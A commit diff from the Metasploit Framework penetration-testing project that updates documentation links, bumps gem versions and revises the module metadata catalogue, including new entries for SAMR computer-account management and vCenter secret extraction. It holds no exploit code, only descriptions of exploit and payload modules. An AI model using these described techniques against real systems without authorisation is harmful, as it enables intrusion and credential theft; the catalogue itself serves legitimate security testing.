automatic module_metadata_base.json update

Land #16677 , Add module for adding/deleting computers via MS-SAMR
Land #16729 , Fix rex table from crashing on unknown characters
2022-06-30 05:36:37 -05:00 · 2022-06-30 12:12:26 +02:00 · 2022-06-29 21:44:31 +01:00 · 2022-06-29 15:11:42 -05:00 · 2022-06-29 13:31:14 -04:00 · 2022-06-29 12:23:05 -05:00
74 changed files with 1567 additions and 505 deletions
@@ -8,8 +8,8 @@ labels: "bug"
  Please fill out each section below, otherwise, your issue will be closed. This info allows Metasploit maintainers to diagnose (and fix!) your issue as quickly as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
-  - Reporting a Bug: https://github.com/rapid7/metasploit-framework/wiki/Reporting-a-Bug
+  - Wiki: https://docs.metasploit.com/
+  - Reporting a Bug: https://docs.metasploit.com/docs/using-metasploit/getting-started/reporting-a-bug.html

  Before opening a new issue, please search existing issues: https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-docs"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -33,7 +33,7 @@ Why should we document this and who will benefit from it?
 ### Draft the doc

 - [ ] Write the doc, following the format listed in these resources:
-  - [Overview on contributing module documentation](https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation)
+  - [Overview on contributing module documentation](https://docs.metasploit.com/docs/development/quality/writing-module-documentation.html)
  - [Docs Templates](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md)
  - [Example of a similar article]()

@@ -8,7 +8,7 @@ labels: "suggestion-feature"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "suggestion-module"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -8,7 +8,7 @@ labels: "question"
  To make it easier for us to help you, please include as much useful information as possible.

  Useful Links:
-  - Wiki: https://github.com/rapid7/metasploit-framework/wiki
+  - Wiki: https://docs.metasploit.com/

  Before opening a new issue, please search existing issues https://github.com/rapid7/metasploit-framework/issues
 -->
@@ -31,4 +31,4 @@ Complex Software Examples:
 We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

 Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
-If you wish to sanitize your pcap, please see the [wiki](https://github.com/rapid7/metasploit-framework/wiki/Sanitizing-PCAPs).
+If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (6.2.2)
+    metasploit-framework (6.2.5)
      actionpack (~> 6.0)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -30,7 +30,7 @@ PATH
      metasploit-concern
      metasploit-credential
      metasploit-model
-      metasploit-payloads (= 2.0.93)
+      metasploit-payloads (= 2.0.94)
      metasploit_data_models
      metasploit_payloads-mettle (= 1.0.18)
      mqtt
@@ -129,7 +129,7 @@ GEM
      activerecord (>= 3.1.0, < 8)
    ast (2.4.2)
    aws-eventstream (1.2.0)
-    aws-partitions (1.595.0)
+    aws-partitions (1.598.0)
    aws-sdk-core (3.131.1)
      aws-eventstream (~> 1, >= 1.0.2)
      aws-partitions (~> 1, >= 1.525.0)
@@ -138,7 +138,7 @@ GEM
    aws-sdk-ec2 (1.317.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
-    aws-sdk-iam (1.68.0)
+    aws-sdk-iam (1.69.0)
      aws-sdk-core (~> 3, >= 3.127.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-kms (1.57.0)
@@ -247,7 +247,7 @@ GEM
      activemodel (~> 6.0)
      activesupport (~> 6.0)
      railties (~> 6.0)
-    metasploit-payloads (2.0.93)
+    metasploit-payloads (2.0.94)
    metasploit_data_models (5.0.5)
      activerecord (~> 6.0)
      activesupport (~> 6.0)
@@ -268,7 +268,7 @@ GEM
    mustermann (1.1.1)
      ruby2_keywords (~> 0.0.1)
    nessus_rest (0.1.6)
-    net-ldap (0.17.0)
+    net-ldap (0.17.1)
    net-protocol (0.1.3)
      timeout
    net-smtp (0.3.1)
@@ -283,7 +283,7 @@ GEM
      mini_portile2 (~> 2.8.0)
      racc (~> 1.4)
    nori (2.6.0)
-    octokit (4.23.0)
+    octokit (4.24.0)
      faraday (>= 1, < 3)
      sawyer (~> 0.9)
    openssl-ccm (1.2.2)
@@ -321,7 +321,7 @@ GEM
    rails-dom-testing (2.0.3)
      activesupport (>= 4.2.0)
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.4.2)
+    rails-html-sanitizer (1.4.3)
      loofah (~> 2.3)
    railties (6.1.6)
      actionpack (= 6.1.6)
@@ -383,7 +383,7 @@ GEM
      rex-socket
      rex-text
    rex-struct2 (0.1.3)
-    rex-text (0.2.37)
+    rex-text (0.2.38)
    rex-zip (0.1.4)
      rex-text
    rexml (3.2.5)
@@ -411,7 +411,7 @@ GEM
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
    rspec-support (3.11.0)
-    rubocop (1.30.0)
+    rubocop (1.30.1)
      parallel (~> 1.10)
      parser (>= 3.1.0.0)
      rainbow (>= 2.2.2, < 4.0)
@@ -427,7 +427,7 @@ GEM
    ruby-progressbar (1.11.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.1.3)
+    ruby_smb (3.1.5)
      bindata
      openssl-ccm
      openssl-cmac
@@ -435,7 +435,7 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.3)
    rubyzip (2.3.2)
-    sawyer (0.9.1)
+    sawyer (0.9.2)
      addressable (>= 2.3.5)
      faraday (>= 0.17.3, < 3)
    simplecov (0.18.2)
@@ -10,10 +10,10 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.588.0, "Apache 2.0"
-aws-sdk-core, 3.131.0, "Apache 2.0"
-aws-sdk-ec2, 1.315.0, "Apache 2.0"
-aws-sdk-iam, 1.68.0, "Apache 2.0"
+aws-partitions, 1.598.0, "Apache 2.0"
+aws-sdk-core, 3.131.1, "Apache 2.0"
+aws-sdk-ec2, 1.317.0, "Apache 2.0"
+aws-sdk-iam, 1.69.0, "Apache 2.0"
 aws-sdk-kms, 1.57.0, "Apache 2.0"
 aws-sdk-s3, 1.114.0, "Apache 2.0"
 aws-sigv4, 1.5.0, "Apache 2.0"
@@ -42,16 +42,8 @@ eventmachine, 1.2.7, "ruby, GPL-2.0"
 factory_bot, 6.2.1, MIT
 factory_bot_rails, 6.2.0, MIT
 faker, 2.21.0, MIT
-faraday, 1.10.0, MIT
-faraday-em_http, 1.0.0, MIT
-faraday-em_synchrony, 1.0.0, MIT
-faraday-excon, 1.1.0, MIT
-faraday-httpclient, 1.0.1, MIT
-faraday-multipart, 1.0.3, MIT
-faraday-net_http, 1.0.1, MIT
-faraday-net_http_persistent, 1.2.0, MIT
-faraday-patron, 1.0.0, MIT
-faraday-rack, 1.0.0, MIT
+faraday, 2.3.0, MIT
+faraday-net_http, 2.0.3, MIT
 faraday-retry, 1.0.3, MIT
 faye-websocket, 0.11.1, "Apache 2.0"
 ffi, 1.15.5, "New BSD"
@@ -62,7 +54,7 @@ gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.4, MIT
+http-cookie, 1.0.5, MIT
 http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.10.0, MIT
@@ -72,27 +64,26 @@ jmespath, 1.6.1, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
 json, 2.6.2, ruby
 little-plugger, 1.1.4, MIT
-logging, 2.3.0, MIT
+logging, 2.3.1, MIT
 loofah, 2.18.0, MIT
 memory_profiler, 1.0.0, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.4, "New BSD"
 metasploit-credential, 5.0.7, "New BSD"
-metasploit-framework, 6.2.2, "New BSD"
+metasploit-framework, 6.2.5, "New BSD"
 metasploit-model, 4.0.4, "New BSD"
-metasploit-payloads, 2.0.87, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.94, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.5, "New BSD"
 metasploit_payloads-mettle, 1.0.18, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
 mini_portile2, 2.8.0, MIT
 minitest, 5.15.0, MIT
 mqtt, 0.5.0, MIT
-msgpack, 1.5.1, "Apache 2.0"
+msgpack, 1.5.2, "Apache 2.0"
 multi_json, 1.15.0, MIT
-multipart-post, 2.1.1, MIT
 mustermann, 1.1.1, MIT
 nessus_rest, 0.1.6, MIT
-net-ldap, 0.17.0, MIT
+net-ldap, 0.17.1, MIT
 net-protocol, 0.1.3, "ruby, Simplified BSD"
 net-smtp, 0.3.1, "ruby, Simplified BSD"
 net-ssh, 6.1.0, MIT
@@ -101,7 +92,7 @@ nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
 nokogiri, 1.13.6, MIT
 nori, 2.6.0, MIT
-octokit, 4.22.0, MIT
+octokit, 4.24.0, MIT
 openssl-ccm, 1.2.2, MIT
 openssl-cmac, 2.0.1, MIT
 openvas-omp, 0.0.4, MIT
@@ -117,18 +108,18 @@ pry-byebug, 3.9.0, MIT
 public_suffix, 4.0.7, MIT
 puma, 5.6.4, "New BSD"
 racc, 1.6.0, "ruby, Simplified BSD"
-rack, 2.2.3, MIT
+rack, 2.2.3.1, MIT
 rack-protection, 2.2.0, MIT
 rack-test, 1.1.0, MIT
 rails-dom-testing, 2.0.3, MIT
-rails-html-sanitizer, 1.4.2, MIT
+rails-html-sanitizer, 1.4.3, MIT
 railties, 6.1.6, MIT
 rainbow, 3.1.1, MIT
 rake, 13.0.6, MIT
 rb-readline, 0.5.5, BSD
 recog, 2.3.23, unknown
 redcarpet, 3.5.1, MIT
-regexp_parser, 2.4.0, MIT
+regexp_parser, 2.5.0, MIT
 reline, 0.2.5, ruby
 rex-arch, 0.1.14, "New BSD"
 rex-bin_tools, 0.1.8, "New BSD"
@@ -157,7 +148,7 @@ rspec-mocks, 3.11.1, MIT
 rspec-rails, 5.1.2, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.11.0, MIT
-rubocop, 1.29.1, MIT
+rubocop, 1.30.1, MIT
 rubocop-ast, 1.18.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
@@ -167,7 +158,7 @@ ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
 ruby_smb, 3.1.3, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
-sawyer, 0.8.2, MIT
+sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
@@ -179,12 +170,12 @@ thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
 tilt, 2.0.10, MIT
 timecop, 0.9.5, MIT
-timeout, 0.2.0, "ruby, Simplified BSD"
+timeout, 0.3.0, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.4, MIT
 tzinfo-data, 1.2022.1, MIT
 unf, 0.1.4, "2-clause BSDL"
-unf_ext, 0.0.8.1, MIT
+unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.1.0, MIT
 unix-crypt, 1.3.0, BSD
 warden, 1.2.9, MIT
@@ -196,5 +187,5 @@ windows_error, 0.1.4, BSD
 winrm, 2.3.6, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.2, "ruby, Simplified BSD"
-yard, 0.9.27, MIT
+yard, 0.9.28, MIT
 zeitwerk, 2.5.4, MIT
@@ -537,6 +537,56 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/dcerpc/samr_computer": {
+    "name": "SAMR Computer Management",
+    "fullname": "auxiliary/admin/dcerpc/samr_computer",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "auxiliary",
+    "author": [
+      "JaGoTu",
+      "Spencer McIntyre"
+    ],
+    "description": "Add, lookup and delete computer accounts via MS-SAMR. By default\n          standard active directory users can add up to 10 new computers to the\n          domain. Administrative privileges however are required to delete the\n          created accounts.",
+    "references": [
+      "URL-https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py"
+    ],
+    "platform": "",
+    "arch": "",
+    "rport": 445,
+    "autofilter_ports": [
+      139,
+      445
+    ],
+    "autofilter_services": [
+      "netbios-ssn",
+      "microsoft-ds"
+    ],
+    "targets": null,
+    "mod_time": "2022-06-28 11:53:05 +0000",
+    "path": "/modules/auxiliary/admin/dcerpc/samr_computer.rb",
+    "is_install_path": true,
+    "ref_name": "admin/dcerpc/samr_computer",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Reliability": [
+
+      ],
+      "Stability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/dns/dyn_dns_update": {
    "name": "DNS Server Dynamic Update Record Injection",
    "fullname": "auxiliary/admin/dns/dyn_dns_update",
@@ -4468,8 +4518,7 @@
    ],
    "description": "This module exploits an unauthenticated arbitrary wordpress options change vulnerability\n          in the Automatic (wp-automatic) plugin <= 3.53.2. If WPEMAIL is provided, the administrator's email\n          address will be changed. User registration is\n          enabled, and default user role is set to administrator. A user is then created with\n          the USER name set. A valid EMAIL is required to get the registration email (not handled in MSF).",
    "references": [
-      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/",
-      "NOCVE-Patched in 3.53.3 without vendor disclosure"
+      "URL-https://blog.nintechnet.com/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
    ],
    "platform": "PHP",
    "arch": "php",
@@ -4490,7 +4539,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2021-11-04 15:28:05 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_automatic_plugin_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_automatic_plugin_privesc",
@@ -4507,6 +4556,9 @@
      "SideEffects": [
        "config-changes",
        "ioc-in-logs"
+      ],
+      "NOCVE": [
+        "Patched in 3.53.3 without vendor disclosure"
      ]
    },
    "session_types": false,
@@ -4649,7 +4701,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/auxiliary/admin/http/wp_gdpr_compliance_privesc.rb",
    "is_install_path": true,
    "ref_name": "admin/http/wp_gdpr_compliance_privesc",
@@ -4657,6 +4709,12 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
      "SideEffects": [
        "config-changes"
      ]
@@ -8854,6 +8912,53 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_admin/vmware/vcenter_offline_mdb_extract": {
+    "name": "VMware vCenter Extract Secrets from vmdir / vmafd DB File",
+    "fullname": "auxiliary/admin/vmware/vcenter_offline_mdb_extract",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-05-10",
+    "type": "auxiliary",
+    "author": [
+      "npm <npm@cesium137.io>"
+    ],
+    "description": "Grab certificates from the vCenter server vmdird and vmafd\n          database files and adds them to loot. The vmdird MDB database file\n          can be found on the live appliance under the path\n          /storage/db/vmware-vmdir/data.mdb, and the DB vmafd is under path\n          /storage/db/vmware-vmafd/afd.db. The vmdir database contains the\n          IdP signing credential, and vmafd contains the vCenter certificate\n          store. This module will accept either file from a live vCenter\n          appliance, or from a vCenter appliance backup archive; either or\n          both files can be supplied.",
+    "references": [
+      "URL-https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": null,
+    "mod_time": "2022-05-26 11:52:56 +0000",
+    "path": "/modules/auxiliary/admin/vmware/vcenter_offline_mdb_extract.rb",
+    "is_install_path": true,
+    "ref_name": "admin/vmware/vcenter_offline_mdb_extract",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_admin/vnc/realvnc_41_bypass": {
    "name": "RealVNC NULL Authentication Mode Bypass",
    "fullname": "auxiliary/admin/vnc/realvnc_41_bypass",
@@ -73032,7 +73137,7 @@
    "targets": [
      "Cisco RV340 Firmware Version <= 1.0.03.24"
    ],
-    "mod_time": "2022-05-11 18:30:11 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/linux/misc/cisco_rv340_sslvpn.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/cisco_rv340_sslvpn",
@@ -73040,9 +73145,15 @@
    "post_auth": false,
    "default_credential": false,
    "notes": {
-      "Stability": "crash-service-restarts",
-      "Reliability": "repeatable-session",
-      "SideEffects": null
+      "Stability": [
+        "crash-service-restarts"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
    },
    "session_types": false,
    "needs_cleanup": null
@@ -73274,7 +73385,7 @@
    "description": "This module exploits a buffer overflow in the RTSP request parsing\n        code of Hikvision DVR appliances. The Hikvision DVR devices record\n        video feeds of surveillance cameras and offer remote administration\n        and playback of recorded footage.\n\n        The vulnerability is present in several models / firmware versions\n        but due to the available test device this module only supports\n        the DS-7204 model.",
    "references": [
      "CVE-2014-4880",
-      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices--multiple-vulnerabilities"
+      "URL-https://www.rapid7.com/blog/post/2014/11/19/r7-2014-18-hikvision-dvr-devices-multiple-vulnerabilities"
    ],
    "platform": "Linux",
    "arch": "armle",
@@ -73289,7 +73400,7 @@
      "DS-7204 Firmware V2.2.10 build 131009",
      "Debug Target"
    ],
-    "mod_time": "2022-01-23 15:28:32 +0000",
+    "mod_time": "2022-06-22 15:49:43 +0000",
    "path": "/modules/exploits/linux/misc/hikvision_rtsp_bof.rb",
    "is_install_path": true,
    "ref_name": "linux/misc/hikvision_rtsp_bof",
@@ -80559,13 +80670,13 @@
    ],
    "description": "This module exploits an OGNL injection in Atlassian Confluence servers. A specially crafted URI can be used to\n          evaluate an OGNL expression resulting in OS command execution.",
    "references": [
-      "CVE-2021-26084",
+      "CVE-2022-26134",
      "URL-https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro",
      "URL-https://gist.githubusercontent.com/bturner-r7/1d0b62fac85235b94f1c95cc4c03fcf3/raw/478e53b6f68b5150eefd53e0956f23d53618d250/confluence-exploit.py",
      "URL-https://github.com/jbaines-r7/through_the_wire",
      "URL-https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis"
    ],
-    "platform": "Linux,Unix",
+    "platform": "Linux,Unix,Windows",
    "arch": "cmd, x86, x64",
    "rport": 8090,
    "autofilter_ports": [
@@ -80585,9 +80696,11 @@
    ],
    "targets": [
      "Unix Command",
-      "Linux Dropper"
+      "Linux Dropper",
+      "Windows Command",
+      "Windows Dropper"
    ],
-    "mod_time": "2022-06-06 22:03:21 +0000",
+    "mod_time": "2022-06-15 17:11:56 +0000",
    "path": "/modules/exploits/multi/http/atlassian_confluence_namespace_ognl_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/atlassian_confluence_namespace_ognl_injection",
@@ -87779,7 +87892,7 @@
      "PHPMailer <5.2.18",
      "PHPMailer 5.2.18 - 5.2.19"
    ],
-    "mod_time": "2020-10-02 17:38:06 +0000",
+    "mod_time": "2022-06-29 12:24:29 +0000",
    "path": "/modules/exploits/multi/http/phpmailer_arg_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/phpmailer_arg_injection",
@@ -95400,7 +95513,7 @@
      "Linux",
      "Windows"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-28 17:02:51 +0000",
    "path": "/modules/exploits/multi/misc/nomad_exec.rb",
    "is_install_path": true,
    "ref_name": "multi/misc/nomad_exec",
@@ -95411,11 +95524,11 @@
      "Stability": [
        "crash-safe"
      ],
-      "Reliability": [
+      "SideEffects": [
        "artifacts-on-disk",
        "ioc-in-logs"
      ],
-      "SideEffects": [
+      "Reliability": [
        "repeatable-session"
      ]
    },
@@ -103548,7 +103661,7 @@
      "Linux (x64)",
      "Linux (cmd)"
    ],
-    "mod_time": "2021-08-27 17:15:33 +0000",
+    "mod_time": "2022-06-10 14:01:57 +0000",
    "path": "/modules/exploits/unix/webapp/bolt_authenticated_rce.rb",
    "is_install_path": true,
    "ref_name": "unix/webapp/bolt_authenticated_rce",
@@ -103556,7 +103669,9 @@
    "post_auth": true,
    "default_credential": false,
    "notes": {
-      "NOCVE": "0day",
+      "NOCVE": [
+        "0day"
+      ],
      "Stability": [
        "service-resource-loss"
      ],
@@ -117961,7 +118076,7 @@
    "description": "This module exploits a vulnerability in the update functionality of\n        Malwarebytes Anti-Malware consumer before 2.0.3 and Malwarebytes\n        Anti-Exploit consumer 1.03.1.1220.\n        Due to the lack of proper update package validation, a man-in-the-middle\n        (MITM) attacker could execute arbitrary code by spoofing the update server\n        data-cdn.mbamupdates.com and uploading an executable. This module has\n        been tested successfully with MBAM 2.0.2.1012 and MBAE 1.03.1.1220.",
    "references": [
      "CVE-2014-4936",
-      " OSVDB-116050",
+      "OSVDB-116050",
      "URL-http://blog.0x3a.com/post/104954032239/cve-2014-4936-malwarebytes-anti-malware-and"
    ],
    "platform": "Windows",
@@ -117976,7 +118091,7 @@
    "targets": [
      "Windows Universal"
    ],
-    "mod_time": "2021-02-17 12:33:59 +0000",
+    "mod_time": "2022-06-10 08:47:41 +0000",
    "path": "/modules/exploits/windows/browser/malwarebytes_update_exec.rb",
    "is_install_path": true,
    "ref_name": "windows/browser/malwarebytes_update_exec",
@@ -170658,7 +170773,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-04-19 11:28:26 +0000",
+    "mod_time": "2022-06-15 13:25:25 +0000",
    "path": "/modules/payloads/singles/cmd/windows/jjs_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/jjs_reverse_tcp",
@@ -170696,7 +170811,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/adduser",
@@ -170735,7 +170850,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_ipknock_tcp",
@@ -170774,7 +170889,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_hidden_tcp",
@@ -170812,7 +170927,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp",
@@ -170851,7 +170966,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_ipv6_tcp_uuid",
@@ -170888,7 +171003,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_named_pipe",
@@ -170925,7 +171040,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_nonx_tcp",
@@ -170963,7 +171078,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp",
@@ -171003,7 +171118,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_rc4",
@@ -171041,7 +171156,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/bind_tcp_uuid",
@@ -171078,7 +171193,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/find_tag",
@@ -171117,7 +171232,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_hop_http",
@@ -171154,7 +171269,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http",
@@ -171191,7 +171306,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_http_proxy_pstore",
@@ -171229,7 +171344,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_ipv6_tcp",
@@ -171266,7 +171381,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
    "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
    "is_install_path": true,
    "ref_name": "cmd/windows/powershell/dllinject/reverse_nonx_tcp",
@@ -171303,7 +171418,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
